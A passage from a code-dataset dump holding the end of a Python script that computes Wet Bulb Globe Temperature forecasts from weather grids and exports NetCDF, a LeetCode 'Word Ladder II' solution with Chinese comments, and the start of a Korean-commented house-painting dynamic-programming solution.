utilities.timing(z=Z,nx=nx,ny=ny,nt=nt)\njday_RTMA_mask = np.where(combined_mask, jday_RTMA, np.nan)\njday_NDFD_mask = np.where(combined_mask, jday_NDFD, np.nan)\njday_mix_mask = np.where(combined_mask, jday_mix, np.nan)\n\nzenith_RTMA, zenith_NDFD, zenith_mix = equations.solar_calc(lat_mask_RTMA, \n lon_mask_RTMA, \n jday_RTMA_mask, \n hour_RTMA, \n lat_mask_mix, \n lon_mask_mix, \n jday_mix_mask, \n hour_mix)\n\n# Restrict data to 2 times\n#log.info(\"Restricting items for two times FOR TESTING\")\n#jday_RTMA = jday_RTMA[:2,:,:]\n#jday_RTMA_mask = jday_RTMA_mask[:2,:,:]\n#hour_RTMA = hour_RTMA[:2,:,:]\n#zenith_RTMA = zenith_RTMA[:2,:,:]\n#jday_NDFD = jday_NDFD[:2,:,:]\n#jday_NDFD_mask = jday_NDFD_mask[:2,:,:]\n#hour_NDFD = hour_NDFD[:2,:,:]\n#zenith_NDFD = zenith_NDFD[:2,:,:]\n#jday_mix = jday_mix[:2,:,:]\n#jday_mix_mask = jday_mix_mask[:2,:,:]\n#hour_mix = hour_mix[:2,:,:]\n#zenith_mix = zenith_mix[:2,:,:]\n\nif DEBUGMODE:\n print(\"jday_RTMA: \",jday_RTMA[:,300,300])\n print(\"jday_RTMA_mask: \",jday_RTMA_mask[:,300,300])\n print(\"hour_RTMA: \",hour_RTMA[:,300,300])\n print(\"zenith_RTMA: \",zenith_RTMA[:,300,300])\n\n#%% Data Imports\nlog.info(\"Data Loading\")\nif not TESTMODE:\n #v1\n #vars_RTMA, data_RTMA, unit_RTMA, fill_RTMA = utilities.RTMA_import(\"resources/WBGT_RTMA.nc\")\n #vars_NDFD, data_NDFD, unit_NDFD, fill_NDFD = utilities.NDFD_import(\"resources/WBGT_NDFD.nc\")\n #vars_NBM, data_NBM = utilities.small_import(\"resources/WBGT_NBM.nc4\")\n #v2 - Convert to NC4 before\n log.info(\"Loading Real Data\")\n vars_RTMA, data_RTMA, unit_RTMA, fill_RTMA = utilities.RTMA_import(\"input/rtma.nc\")\n vars_NDFD, data_NDFD, unit_NDFD, fill_NDFD = utilities.NDFD_import(\"input/ndfd.nc\") #CHECK\n #vars_NBM, data_NBM = utilities.small_import(\"input/nbm.nc\")\n vars_NBM, data_NBM,unit_NBM,fill_NBM = utilities.NBM_import(\"input/nbm.nc\")\n #v3 - Native dataset format\n #vars_RTMA, data_RTMA, unit_RTMA, fill_RTMA = utilities.RTMA_import_grib(\"input/rtma_combo.grb2\")\n #print(data_RTMA)\n\nelif TESTMODE:\n log.info(\"Loading Test Data\")\n data_RTMA = utilities.data_gen(\"RTMA\")\n data_NDFD = utilities.data_gen(\"NDFD\")\n data_NBM = utilities.data_gen(\"NBM\")\n\n# get the elevation data\n#vars_elev, data_elev = utilities.small_import(\"resources/elevation_regrid_NCVA.nc\")\nvars_elev, data_elev = utilities.small_import(\"resources/elevation_regrid_sercc.nc\")\nelev_var = data_elev[\"var\"]\nif DEBUGMODE:\n print(\"data_elev: \",elev_var.shape)\n print(\"data_elev: \",elev_var[300,300])\n\n##%%% RTMA Bias Correction\nlog.info(\"SERCC's RTMA Bias Correction\")\ndata_RTMA = utilities.RTMA_bias(data_RTMA, z=Z)\n#log.info(\"SERCC's NDFD Bias Correction\")\n#data_NDFD = utilities.NDFD_bias(data_NDFD, z=Z)\n#log.info(\"SERCC's NBM Bias Correction\")\n#data_NBM = utilities.NBM_bias(data_NBM, z=Z)\n\n#%%% Wind Speed Correction\nlog.info(\"Wind Speed Correction\")\ndata_RTMA[\"WIND_10maboveground\"] = np.where(data_RTMA[\"WIND_10maboveground\"] < 0.5, \n 0.5, data_RTMA[\"WIND_10maboveground\"])\ndata_NDFD[\"WIND_10maboveground\"] = np.where(data_NDFD[\"WIND_10maboveground\"] < 0.5, \n 0.5, data_NDFD[\"WIND_10maboveground\"])\n#data_NDFD[\"WIND_10maboveground\"] = np.where(data_NDFD[\"WIND_10maboveground\"] < 0.5, \n# 0.5, data_NDFD[\"WIND_10maboveground\"])\ndata_NBM[\"WIND_10maboveground\"] = np.where(data_NBM[\"WIND_10maboveground\"] < 0.5, \n 0.5, data_NBM[\"WIND_10maboveground\"])\n\n#%%% Name Variables\nlog.info(\"Variable Refactoring\")\nlat_RTMA = data_RTMA[\"latitude\"]\nlon_RTMA = data_RTMA[\"longitude\"]\ntemp_RTMA = data_RTMA[\"TMP_2maboveground\"]\ndewp_RTMA = data_RTMA[\"DPT_2maboveground\"]\nwind_RTMA = data_RTMA[\"WIND_10maboveground\"]\n#cldc_RTMA = data_RTMA[\"TCDC_surface\"]\ncldc_RTMA = data_RTMA[\"TCDC_entireatmosphere_consideredasasinglelayer_\"]\n\nlat_NDFD = data_NDFD[\"latitude\"]\nlon_NDFD = data_NDFD[\"longitude\"]\ntemp_NDFD = data_NDFD[\"TMP_2maboveground\"]\ndewp_NDFD = data_NDFD[\"DPT_2maboveground\"]\nwind_NDFD = data_NDFD[\"WIND_10maboveground\"]\ncldc_NDFD = data_NDFD[\"TCDC_surface\"]\n\nlat_NBM = data_NBM[\"latitude\"]\nlon_NBM = data_NBM[\"longitude\"]\ntemp_NBM = data_NBM[\"TMP_2maboveground\"]\ndewp_NBM = data_NBM[\"DPT_2maboveground\"]\nwind_NBM = data_NBM[\"WIND_10maboveground\"]\ncldc_NBM = data_NBM[\"TCDC_surface\"]\n\n# Increase the speed here\nelev = np.atleast_3d(data_elev[\"var\"])\n# Get the elevation\nelev = np.swapaxes(elev, 0, 1)\nelev = np.swapaxes(elev, 0, 2)\n#print(elev.shape)\n#print(\"elev: \",elev[0,:,300])\n\n##%%% Combine NDFD and NBM\nlog.info(\"Combine NDFD and NBM datasets\")\ntemp_mix = np.concatenate((temp_NDFD, temp_NBM[46:,:,:]), axis=0)\ndewp_mix = np.concatenate((dewp_NDFD, dewp_NBM[46:,:,:]), axis=0)\nwind_mix = np.concatenate((wind_NDFD, wind_NBM[46:,:,:]), axis=0)\ncldc_mix = np.concatenate((cldc_NDFD, cldc_NBM[46:,:,:]), axis=0)\n\n# From this point forward, all calculations should be just \n# 1) RTMA\n# OR\n# 2) mix and NOT NDFD/NBM\n\n## DON'T COMBINE FOR NOW\n#log.info(\"DO NOT Combine NDFD and NBM datasets. Using NBM instead\")\n#temp_mix = temp_NBM\n#dewp_mix = dewp_NBM\n#wind_mix = wind_NBM\n#cldc_mix = cldc_NBM\n\n#%%% Mask Arrays\nlog.info(\"SKIP Mask Imported Arrays\")\ntemp_RTMA = np.where(combined_mask, temp_RTMA, np.nan)\ndewp_RTMA = np.where(combined_mask, dewp_RTMA, np.nan)\nwind_RTMA = np.where(combined_mask, wind_RTMA, np.nan)\ncldc_RTMA = np.where(combined_mask, cldc_RTMA, np.nan)\nelev_RTMA = np.where(combined_mask, elev, np.nan)\n#\ntemp_mix = np.where(combined_mask, temp_mix, np.nan)\ndewp_mix = np.where(combined_mask, dewp_mix, np.nan)\nwind_mix = np.where(combined_mask, wind_mix, np.nan)\ncldc_mix = np.where(combined_mask, cldc_mix, np.nan)\nelev_mix = np.where(combined_mask, elev, np.nan)\n\n#%%% Unit Conversion\nlog.info(\"Convert Temperature Units\")\nt_conv = 273.15\n\ntemp_RTMA -= t_conv\ndewp_RTMA -= t_conv\ncldc_RTMA = cldc_RTMA/100.0\n\n#cldc_NDFD = cldc_NDFD/100.0\n\ntemp_mix -= t_conv\ndewp_mix -= t_conv\ncldc_mix = cldc_mix/100.0\n\n#%% Solar Intensity\n#%%% Calculate Relative Humidity\nlog.info(\"Calculate Relative Humidity\")\nrh_RTMA = equations.rh_calc(temp_RTMA, dewp_RTMA)\nrh_mix = equations.rh_calc(temp_mix, dewp_mix)\n\n#%%% Solar Radiation\nlog.info(\"Calculate Solar Radiation\")\nnght_RTMA = np.where((hour_RTMA <= 10) & (hour_RTMA >= 0), 0, 1)\nnght_mix = np.where((hour_mix <= 10) & (hour_mix >= 0), 0, 1)\n\n#print(\"nght_RTMA: \",nght_RTMA[:,300,300])\n#print(\"zenith_rtma=\",zenith_RTMA.shape)\n#print(\"elev_rtma=\",elev_RTMA.shape)\n\nif DEBUGMODE:\n print(\"lat_RTMA: \",lat_RTMA[300,300])\n print(\"lon_RTMA: \",lon_RTMA[300,300])\n print(\"zenith_RTMA: \",zenith_RTMA[:,300,300])\n print(\"elev_RTMA: \",elev_RTMA[:,300,300])\n print(\"jday_RTMA: \",jday_RTMA[:,300,300])\n print(\"hour_RTMA: \",hour_RTMA[:,300,300])\n\n#%% Data Imports\n\n#\n# ISSUE IS HERE\n#\nsr_RTMA = equations.solar_rad(jday_RTMA, hour_RTMA, \n lat_RTMA, lon_RTMA, \n zenith_RTMA, elev_RTMA)\n\nsr_RTMA = np.where(combined_mask, sr_RTMA, np.nan)*nght_RTMA\nif DEBUGMODE:\n print(\"sr_RTMA: \",sr_RTMA[:,300,300])\n\nsun_RTMA = utilities.srad_bias(sr_RTMA, z=Z)\nshd_RTMA = utilities.srad_bias(sr_RTMA*(1-0.75*(1**3.4)), z=Z)\nact_RTMA = utilities.srad_bias(sr_RTMA*(1-0.75*(np.power(cldc_RTMA, 3.4))), z=Z)\n\n\nsr_mix = equations.solar_rad(jday_mix, hour_mix, \n lat_mix, lon_mix, \n zenith_mix, elev_mix)\n\nsr_mix = np.where(combined_mask, sr_mix, np.nan)*nght_mix\n\nsun_mix = sr_mix\nshd_mix = sr_mix*(1-0.75*(1**3.4))\n#print(\"sr_mix = \",sr_mix.shape)\n#print(\"cldc_mix = \",cldc_mix.shape)\nact_mix = sr_mix*(1-0.75*(np.power(cldc_mix, 3.4)))\n\n#%%% Morning Shade\nlog.info(\"Calculate Morning Shade\")\nmshd_RTMA = np.where((hour_RTMA >= 10) & (hour_RTMA <= 14), True, False)\nmshd_mix = np.where((hour_mix >= 10) & (hour_mix <= 14), True, False)\n\nsun_RTMA = np.where(mshd_RTMA, shd_RTMA, sun_RTMA)\nif DEBUGMODE:\n print(\"sun_RTMA: \",sun_RTMA[:,300,300])\nact_RTMA = np.where(mshd_RTMA, shd_RTMA, act_RTMA)\n\nsun_mix = np.where(mshd_mix, shd_mix, sun_mix)\nact_mix = np.where(mshd_mix, shd_mix, act_mix)\n\n#%%% Theoretical Maximum Solar Radiation\nlog.info(\"Calculate Maximum Solar Radiation\")\nsmax_RTMA = equations.solar_max(jday_RTMA_mask, zenith_RTMA)\nif DEBUGMODE:\n print(\"smax_RTMA: \",smax_RTMA[:,300,300])\nsmax_mix = equations.solar_max(jday_mix_mask, zenith_mix)\n\nsun_RTMA = np.where(sun_RTMA >= smax_RTMA, smax_RTMA, sun_RTMA)\nshd_RTMA = np.where(shd_RTMA >= smax_RTMA, smax_RTMA, shd_RTMA)\nact_RTMA = np.where(act_RTMA >= smax_RTMA, smax_RTMA, act_RTMA)\n\nsun_mix = np.where(sun_mix >= smax_mix, smax_mix, sun_mix)\nshd_mix = np.where(shd_mix >= smax_mix, smax_mix, shd_mix)\nact_mix = np.where(act_mix >= smax_mix, smax_mix, act_mix)\n\nstarsun_RTMA = sun_RTMA/smax_RTMA\nstarshd_RTMA = shd_RTMA/smax_RTMA\nstaract_RTMA = act_RTMA/smax_RTMA\n\nstarsun_mix = sun_mix/smax_mix\nstarshd_mix = shd_mix/smax_mix\nstaract_mix = act_mix/smax_mix\n\n\n#%%% Diffuse and Direct Solar Radiation\nlog.info(\"Calculate Diffuse and Direct Solar Radiation\")\nfdb_sun_RTMA, fdif_sun_RTMA = equations.direct_diffuse(zenith_RTMA, starsun_RTMA)\nfdb_shd_RTMA, fdif_shd_RTMA = equations.direct_diffuse(zenith_RTMA, starshd_RTMA)\nfdb_act_RTMA, fdif_act_RTMA = equations.direct_diffuse(zenith_RTMA, staract_RTMA)\n\nfdb_sun_mix, fdif_sun_mix = equations.direct_diffuse(zenith_mix, starsun_mix)\nfdb_shd_mix, fdif_shd_mix = equations.direct_diffuse(zenith_mix, starshd_mix)\nfdb_act_mix, fdif_act_mix = equations.direct_diffuse(zenith_mix, staract_mix) \n\n#%% Wind Speed \n#%%% Estimate Stability Class\nlog.info(\"Estimate Wind Stability Class\")\nstabt_sun_RTMA = equations.stability(nght_RTMA, wind_RTMA, sun_RTMA)\nstabt_act_RTMA = equations.stability(nght_RTMA, wind_RTMA, act_RTMA)\nstabt_shd_RTMA = equations.stability(nght_RTMA, wind_RTMA, shd_RTMA)\n\nstabt_sun_mix = equations.stability(nght_mix, wind_mix, sun_mix)\nstabt_act_mix = equations.stability(nght_mix, wind_mix, act_mix)\nstabt_shd_mix = equations.stability(nght_mix, wind_mix, shd_mix)\n\n#%%% Estimate Wind Speed\nlog.info(\"Estimate Wind Speed\")\nest_speed_sun_RTMA = equations.est_wind_speed(wind_RTMA, stabt_sun_RTMA)\nest_speed_act_RTMA = equations.est_wind_speed(wind_RTMA, stabt_act_RTMA)\nest_speed_shd_RTMA = equations.est_wind_speed(wind_RTMA, stabt_shd_RTMA)\n\nest_speed_sun_mix = equations.est_wind_speed(wind_mix, stabt_sun_mix)\nest_speed_act_mix = equations.est_wind_speed(wind_mix, stabt_act_mix)\nest_speed_shd_mix = equations.est_wind_speed(wind_mix, stabt_shd_mix)\n\n#%% Natural Wet Bulb Temp\n#%%% Radiative Heating Switch\nlog.info(\"Radiative Heating\")\nrad_RTMA = np.where(nght_RTMA == 0, 1, 0)\nrad_mix = np.where(nght_mix == 0, 1, 0)\n\n#%%% Calculate Wet Bulb Temperature\nlog.info(\"Calculate Wet Bulb Temperature for RTMA Dataset\")\ntwb_sun_RTMA = equations.twb(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_sun_RTMA, sun_RTMA, fdb_sun_RTMA, np.cos(zenith_RTMA*np.pi/180), rad_RTMA)\nif DEBUGMODE:\n print(\"dewp_RTMA: \",dewp_RTMA[:,300,300])\n print(\"rh_RTMA: \",rh_RTMA[:,300,300])\n print(\"est_speed_sun_RTMA: \",est_speed_sun_RTMA[:,300,300])\n print(\"sun_RTMA: \",sun_RTMA[:,300,300])\n print(\"fdb_sun_RTMA: \",fdb_sun_RTMA[:,300,300])\n print(\"zenith_RTMA: \",zenith_RTMA[:,300,300])\n print(\"rad_RTMA: \",rad_RTMA[:,300,300])\ntwb_shade_RTMA = equations.twb(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_shd_RTMA, shd_RTMA, fdb_shd_RTMA, np.cos(zenith_RTMA*np.pi/180), rad_RTMA)\ntwb_actual_RTMA = equations.twb(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_act_RTMA, act_RTMA, fdb_act_RTMA, np.cos(zenith_RTMA*np.pi/180), rad_RTMA)\n\nlog.info(\"Calculate Wet Bulb Temperature for mix Dataset\")\ntwb_sun_mix = equations.twb(temp_mix, dewp_mix, rh_mix, est_speed_sun_mix, sun_mix, fdb_sun_mix, np.cos(zenith_mix*np.pi/180), rad_mix)\nif DEBUGMODE:\n print(twb_sun_mix[:,300,300])\ntwb_shade_mix = equations.twb(temp_mix, dewp_mix, rh_mix, est_speed_shd_mix, shd_mix, fdb_shd_mix, np.cos(zenith_mix*np.pi/180), rad_mix)\ntwb_actual_mix = equations.twb(temp_mix, dewp_mix, rh_mix, est_speed_act_mix, act_mix, fdb_act_mix, np.cos(zenith_mix*np.pi/180), rad_mix)\n\n#%%% Calculate Wet Globe Temperature\nlog.info(\"Calculate Wet Globe Temperature for RTMA Dataset\")\ntglobe_sun_RTMA = equations.tglobe(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_sun_RTMA, sun_RTMA, fdb_sun_RTMA, np.cos(zenith_RTMA*np.pi/180))\nif DEBUGMODE:\n print(tglobe_sun_RTMA[:,300,300])\ntglobe_shade_RTMA = equations.tglobe(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_shd_RTMA, shd_RTMA, fdb_shd_RTMA, zenith_RTMA*np.pi/180)\ntglobe_actual_RTMA = equations.tglobe(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_act_RTMA, act_RTMA, fdb_act_RTMA, zenith_RTMA*np.pi/180)\n\nlog.info(\"Calculate Wet Globe Temperature for mix Dataset\")\ntglobe_sun_mix = equations.tglobe(temp_mix, dewp_mix, rh_mix, est_speed_sun_mix, sun_mix, fdb_sun_mix, zenith_mix*np.pi/180)\nif DEBUGMODE:\n print(tglobe_sun_mix[:,300,300])\ntglobe_shade_mix = equations.tglobe(temp_mix, dewp_mix, rh_mix, est_speed_shd_mix, shd_mix, fdb_shd_mix, zenith_mix*np.pi/180)\ntglobe_actual_mix = equations.tglobe(temp_mix, dewp_mix, rh_mix, est_speed_act_mix, act_mix, fdb_act_mix, zenith_mix*np.pi/180)\n\n#%% Wet Bulb Globe Temperature\n#%%% Calculate Wet Bulb Globe Temperature\nlog.info(\"Combine Wet Bulb and Wet Globe Temperature for RTMA Dataset\")\nWBGT_sun_RTMA = 0.7*twb_sun_RTMA + 0.2*tglobe_sun_RTMA + 0.1*temp_RTMA\nif DEBUGMODE:\n print(WBGT_sun_RTMA[:,300,300])\nWBGT_shade_RTMA = 0.7*twb_shade_RTMA + 0.2*tglobe_shade_RTMA + 0.1*temp_RTMA\nWBGT_actual_RTMA = 0.7*twb_actual_RTMA + 0.2*tglobe_actual_RTMA + 0.1*temp_RTMA\n\nlog.info(\"Combine Wet Bulb and Wet Globe Temperature for mix Dataset\")\nWBGT_sun_mix = 0.7*twb_sun_mix + 0.2*tglobe_sun_mix + 0.1*temp_mix\nif DEBUGMODE:\n print(WBGT_sun_mix[:,300,300])\nWBGT_shade_mix = 0.7*twb_shade_mix + 0.2*tglobe_shade_mix + 0.1*temp_mix\nWBGT_actual_mix = 0.7*twb_actual_mix + 0.2*tglobe_actual_mix + 0.1*temp_mix\n\nlog.info(\"Combine RTMA and mix (NDFD/NBM) Datasets\")\n#Convert from C to F\nWBGT_sun = np.concatenate((WBGT_sun_RTMA*(9/5)+32, WBGT_sun_mix*(9/5)+32), axis=0)\nWBGT_shade = np.concatenate((WBGT_sun_RTMA*(9/5)+32, WBGT_sun_mix*(9/5)+32), axis=0)\nWBGT_actual = np.concatenate((WBGT_sun_RTMA*(9/5)+32, WBGT_sun_mix*(9/5)+32), axis=0)\n\nWBGT_airtemp = np.concatenate((temp_RTMA*(9/5)+32, temp_mix*(9/5)+32), axis=0)\n\n#%%% Export Wet Bulb Globe Temperature\nlog.info(\"Export NetCDF Version 4\")\noutfilename = \"wbgt_\"+vdate_ymdh+\".nc4\"\noutfile = Dataset(outfilename, \"w\", format=\"NETCDF4\")\n\n#outfile.title = 'Wet Bulb Globe Temperature (WBGT) forecast using RTMA, NDFD, and NBM. Written for SERCC by NC SCO'\noutfile.institution = \"Southeast Regional Climate Center\"\noutfile.source = \"TBD\"\noutfile.Conventions = 'CF-1.5'\noutfile.references = \"TBD\"\noutfile.validtime = vtime_rtma\n\n# Create the dimensions\n#lon = outfile.createDimension(\"lat\", nx)\n#lat = outfile.createDimension(\"lon\", ny)\n#time = outfile.createDimension(\"time\", None)\ny = outfile.createDimension(\"y\", ny)\nx = outfile.createDimension(\"x\", nx)\nt = outfile.createDimension(\"t\", None)\n\n### create time axis\nout_time = outfile.createVariable('time', 'f8', ('t'),zlib=True)\nout_time.setncatts({\n 'standard_name': u\"time\",\\\n 'long_name': u\"time\",\\\n #'units':u\"Hours Since \"+vtime+\"\",\\\n 'units':u\"Seconds since 1970-01-01 00:00:00.0 0:00\",\\\n 'coordinates':u'time',\\\n '_CoordinateAxisType':U'Time',\\\n 'calendar':u'gregorian',\\\n 'reference_date':u\"\"+vtime_rtma+\"\",\\\n})\nout_time[:]=times[:]\n\n# create latitude axis\nout_lat = outfile.createVariable('latitude', 'f8', ('y','x'),zlib=True)\nout_lat.setncatts({\n 'standard_name': u\"latitude\",\\\n 'long_name': u\"latitude\",\\\n 'units':u\"degrees_north\",\\\n '_CoordinateAxisType':u\"Lat\",\\\n# 'coordinates':u'latitude',\\\n})\nout_lat[:,:]=lat_RTMA[:,:]\n\n# create longitude axis\nout_lon = outfile.createVariable('longitude', 'f8', ('y','x'),zlib=True)\nout_lon.setncatts({\n 'standard_name': u\"longitude\",\\\n 'long_name': u\"longitude\",\\\n 'units':u\"degrees_east\",\\\n '_CoordinateAxisType':u\"Lon\",\\\n# 'coordinates':u'longitude',\\\n})\nout_lon[:,:]=lon_RTMA[:,:]-360\n\n### Add the data source\nout_source = outfile.createVariable('source', 'S10', ('t'),zlib=True)\nout_source.setncatts({\n 'standard_name': u\"Data Source Used\",\\\n 'long_name': u\"Data Source Used\",\\\n})\nout_source[:]=times_source[:]\n\n# create latitude axis\n\n# Add the air temp\n#log.info(\"Writing out air temp to file\")\n#WBGT_airtemp_var = outfile.createVariable(\"airtemp\",\"f8\",('t','y','x'),zlib=True)\n#WBGT_airtemp_var.setncatts({\n# 'long_name': u\"Air Temperature\",\\\n# 'units': u\"degF\", 'level_desc': u'Surface',\\\n# 'var_desc': u\"Air Temperature\",\\\n# 'coordinates':u'latitude longitude',\\\n# 'level_desc':u\"Surface\",\\\n# 'min': 0,\\\n#})\n#WBGT_airtemp_var[:,:,:] = WBGT_airtemp[:,:,:]\n\n# Add the WBGT_SUN\nlog.info(\"Writing out WBGT Sun to file\")\nWBGT_sun_var = outfile.createVariable(\"wbgt_sun\",\"f8\",('t','y','x'),zlib=True)\n#WBGT_sun_var = outfile.createVariable(\"wbgt_sun\",\"f8\",('y','x','t'),zlib=True)\nWBGT_sun_var.setncatts({\n 'long_name': u\"Sun WBGT\",\\\n 'units': u\"degF\", 'level_desc': u'Surface',\\\n 'var_desc': u\"Sun WBGT\",\\\n 'coordinates':u'latitude longitude',\\\n 'level_desc':u\"Surface\",\\\n 'min': 0,\\\n})\n#print(\"var WBGT_sun=\",WBGT_sun.shape)\n#print(\"nc WBGT_sun=\",WBGT_sun_var.shape)\nWBGT_sun_var[:,:,:] = WBGT_sun[:,:,:]\n#outfile.variables['wbgt_sun'][:] = WBGT_sun\n\n# Add the WBGT_SHADE\n#WBGT_shade_var = outfile.createVariable(\"wbgt_shade\",\"f8\",('lat','lon','time'),zlib=True)\n#WBGT_shade_var = outfile.createVariable(\"wbgt_shade\",\"f8\",('y','x','t'),zlib=True)\nlog.info(\"Writing out WBGT Shade to file\")\nWBGT_shade_var = outfile.createVariable(\"wbgt_shade\",\"f8\",('t','y','x'),zlib=True)\nWBGT_shade_var.setncatts({\n 'long_name': u\"Shade WBGT\",\\\n 'units': u\"degF\", 'level_desc': u'Surface',\\\n 'var_desc': u\"Shade WBGT\",\\\n 'coordinates':u'latitude longitude',\\\n 'level_desc':u\"Surface\",\\\n 'min': 0,\\\n})\nWBGT_shade_var[:,:,:] = WBGT_shade[:,:,:]\n\n# Add the WBGT_ACTUAL\n#WBGT_actual_var = outfile.createVariable(\"wbgt_actual\",\"f8\",('y','x','t'),zlib=True)\nlog.info(\"Writing out WBGT Actual to file\")\nWBGT_actual_var = outfile.createVariable(\"wbgt_actual\",\"f8\",('t','y','x'),zlib=True)\nWBGT_actual_var.setncatts({\n 'long_name': u\"Actual WBGT\",\\\n 'units': u\"degF\", 'level_desc': u'Surface',\\\n 'var_desc': u\"Actual WBGT\",\\\n 'coordinates':u'latitude longitude',\\\n 'level_desc':u\"Surface\",\\\n 'min': 0,\\\n})\nWBGT_actual_var[:,:,:] = WBGT_actual[:,:,:]\noutfile.close()\n","repo_name":"jamcguir/wbgt_python","sub_path":"WBGT.py","file_name":"WBGT.py","file_ext":"py","file_size_in_byte":24603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"12557900092","text":"#\n# @lc app=leetcode id=126 lang=python3\n#\n# [126] Word Ladder II\n#\n\n\n# @lc code=start\n\n\nclass Solution:\n def findLadders(\n self, beginWord: str, endWord: str, wordList: List[str]\n ) -> List[List[str]]:\n import collections\n\n # 定义答案\n ans = []\n # 转为set,判断是否存在快很多, 不然127题就会超时\n wordList = set(wordList)\n\n # 终点如果不存在于单词中,直接返回\n if endWord not in wordList:\n return ans\n\n # 我们下面题解中会多次用到一个单词对应的路径的最短距离:\n # 这个是指这个单词在最短路径中离beginWord或者离endWord的距离(根据方向不同,降序升序也有不同)\n\n # 首先先用一遍bfs去找到终点对应的路径的最短距离\n # 这里用dist记录从beginWord到某个单词的最短距离,遇到endWord就跳出\n # 这样子最后符合条件的最短路径中终点之前的单词的最短路径的距离也会被保存下来\n dist = {}\n dist[beginWord] = 0\n\n # BFS\n st = collections.deque()\n st.append(beginWord)\n\n def f():\n while st:\n q = st.popleft()\n for xx in range(len(q)):\n for index in range(97, 123):\n tempq = q[:xx] + chr(index) + q[xx + 1 :]\n if tempq in wordList and tempq not in dist:\n dist[tempq] = dist[q] + 1\n if tempq == endWord:\n return\n st.append(tempq)\n\n f()\n # BFS end\n\n # 重点来了,敲黑板\n # 因为我们前面找最短长度时候,是顺着找,其实是有很多路径试错的\n # 特别是加的那个第32个测试用例,\"aaaaa\",\"ggggg\"那个\n # 如果我们再找路径的时候还是和上面的一样顺着遍历, 我pycharm跑了好久都没跑出来, 试错路径太多了\n\n # 这里我们反着来, 正着找和反着找,试错的路径会有很多不一样,但是能到终点的正确的路径是会包含的\n # 为何? 这里要体会一下,因为我们在第一步中仅仅是找到路径的长度\n # 并且! 所有比目标矮一级的单词我们都找到了(bfs性质)\n\n # 第一步中找到的节点对应的长度只是所有节点的子集, 下面这里也只用到了路径的长度这一个信息\n\n # 从终点开始遍历, 那么越离起点进,dist里面值是越小的\n # 所以判断是dist[root] == dist[temproot] + 1:\n # 当前单词的距离 = 改一个字母的单词的距离 + 1\n path = [endWord]\n\n def bfs(root):\n # 遇到起点,反向,加入答案\n if root == beginWord:\n ans.append(path[::-1])\n else:\n for xx in range(len(root)):\n for index in range(97, 123):\n # temproot是改变了一个单词的root\n temproot = root[:xx] + chr(index) + root[xx + 1 :]\n # 重点来了,如果temproot的高度我们获取到了\n # 那么最短路径是可能包含这个单词的(也可能不包含,得试)\n # 然后如果我们下一个遍历的单词的长度是\n if temproot in dist and dist[root] == dist[temproot] + 1:\n path.append(temproot)\n bfs(temproot)\n path.pop()\n\n bfs(endWord)\n return ans\n\n\n# class Solution:\n# def findLadders(\n# self, beginWord: str, endWord: str, wordList: list[str]\n# ) -> list[list[str]]:\n# # import copy\n# from collections import deque\n\n# wordSet = set(wordList)\n# if endWord not in wordSet:\n# return []\n# queue = deque()\n# visited = set()\n# beginList = list()\n# beginList.append(beginWord)\n# resList = list()\n# queue.append(beginList)\n# foundMinStep = False\n# while queue and not foundMinStep:\n# size = len(queue)\n# for idx in range(size):\n# curList = queue.popleft()\n\n# if curList[-1] == endWord:\n# foundMinStep = True\n# resList.append(curList)\n# else:\n# if curList[-1] not in visited:\n# curWord = curList[-1]\n# wordSet.discard(curWord)\n# for charIndex in range(len(curWord)):\n# # for every pos in this word,\n# for i in range(26):\n# # test 26 letter in this pos\n# newChar = chr(ord(\"a\") + i)\n# newWord = (\n# curWord[:charIndex]\n# + newChar\n# + curWord[charIndex + 1 :]\n# )\n# # print(newWord)\n# if newWord == curWord:\n# continue\n# if newWord not in wordSet:\n# continue\n# # if newWord not in visited:\n# # visited.add(newWord)\n# newList = curList[:]\n# newList.append(newWord)\n# queue.append(newList)\n# # print(newList)\n# return resList\n\n\n# @lc code=end\n","repo_name":"REDhawC/LeetCode","sub_path":"126.word-ladder-ii.py","file_name":"126.word-ladder-ii.py","file_ext":"py","file_size_in_byte":5867,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"23417661557","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\n# 입력\r\nN = int(input()) # 집의 개수\r\ncost = [list(map(int, input().split())) for _ in range(N)] # cost[i] = i번째 집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n\r\n# dp 배열 채우기\r\n'''\r\ndp[0] = cost[0]\r\ndp[i] = [\r\n 첫번째 집을 빨간색으로 칠하고 i번째 집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n 첫번째 집을 초록색으로 칠하고 i번째 집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n 첫번째 집을 파란색으로 칠하고 i번째 집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n]\r\n\r\n다만 두번째 집은 첫번째 집과 같은 색깔로 칠할 수 없으므로,\r\n dp[1][0][0] = 첫번째 집을 빨간색으로 칠하고 두번째 집을 빨간색으로 칠하는 비용\r\n dp[1][1][1] = 첫번째 집을 초록색으로 칠하고 두번째 집을 초록색으로 칠하는 비용\r\n dp[1][2][2] = 첫번째 집을 파란색으로 칠하고 두번째 집을 파란색으로 칠하는 비용\r\n위의 세 요소는 가능한 최대값인 2000으로 설정했다.\r\n'''\r\n\r\ndp = [cost[0]] + [[[0, 0, 0] for _ in range(3)] for _ in range(N-1)]\r\ndp[1] = [\r\n [2000, cost[0][0] + cost[1][1], cost[0][0] + cost[1][2]],\r\n [cost[0][1] + cost[1][0], 2000, cost[0][1] + cost[1][2]],\r\n [cost[0][2] + cost[1][0], cost[0][2] + cost[1][1], 2000]\r\n]\r\n\r\nfor i in range(2, N):\r\n for j in range(3):\r\n for k in range(3):\r\n min_cost = min([dp[i-1][j][x] for x in range(3) if x != k]) # 이전 집과 같은 색으로 칠할 수 없음\r\n dp[i][j][k] = min_cost + cost[i][k]\r\n\r\n# 최소 비용 출력\r\n'''\r\n모든 집을 칠하는 최소 비용은 \r\ndp[N-1] = [\r\n 첫번째 집을 빨간색으로 칠하고 마지막 집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n 첫번째 집을 초록색으로 칠하고 마지막 